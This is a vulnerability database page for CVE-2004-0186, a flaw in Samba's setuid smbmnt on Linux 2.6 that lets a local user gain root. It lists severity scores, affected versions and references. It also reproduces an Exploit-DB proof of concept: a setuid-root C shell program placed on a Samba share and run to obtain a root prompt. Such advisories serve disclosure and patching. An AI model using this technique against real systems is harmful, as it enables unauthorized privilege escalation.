CVE-2004-0186 : Detail

CVE-2004-0186

0.53%V4
Local
2004-09-01
02h00 +00:00
2004-08-19
22h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

smbmnt in Samba 2.x and 3.x on Linux 2.6, when installed setuid, allows local users to gain root privileges by mounting a Samba share that contains a setuid root program, whose setuid attributes are not cleared when the share is mounted.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23674

Publication date : 2004-02-08 23h00 +00:00
Author : Martin Fiala
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9619/info A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel. The issue appears to exist due to a lack of sufficient sanity checks performed when executing a file that is hosted on a remote Samba share. An attacker may exploit this condition to gain elevated privileges, as the setuid/setgid bit of a remote file is honored on the local system. misko@slovakia:~$ smbmount --version Usage: mount.smbfs service mountpoint [-n] [-o options,...] Version 3.0.1-Debian misko@slovakia:~$ ls -l /usr/bin/smbmount - - -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount misko@slovakia:~$ ls -l /usr/bin/smbmnt - - -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt ^ Confirmed to be default on Debian and Mandrake. share:/data/share# cat a.c main() { setuid(0); setgid(0); system("/bin/bash"); } share:/data/share# make a cc a.c -o a share:/data/share# chmod +s a share:/data/share# share:/etc/samba/smb.conf [share] path = /data/share writable = no locking = no public = yes guest ok = yes comment = Share share:/data/share# ls -l a - - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a misko@slovakia:~$ ls -l pokus/a - - -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a misko@slovakia:~$ pokus/a root@slovakia:~# id uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333) root@slovakia:~#

Products Mentioned

Configuraton 0

Samba>>Samba >> Version 2.0

Samba>>Samba >> Version 3.0.0

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6_test9_cvs

    References

    http://marc.info/?l=bugtraq&m=107657505718743&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://www.osvdb.org/3916
    Tags : vdb-entry, x_refsource_OSVDB
    http://marc.info/?l=bugtraq&m=107636290906296&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://www.debian.org/security/2004/dsa-463
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://www.securityfocus.com/bid/9619
    Tags : vdb-entry, x_refsource_BID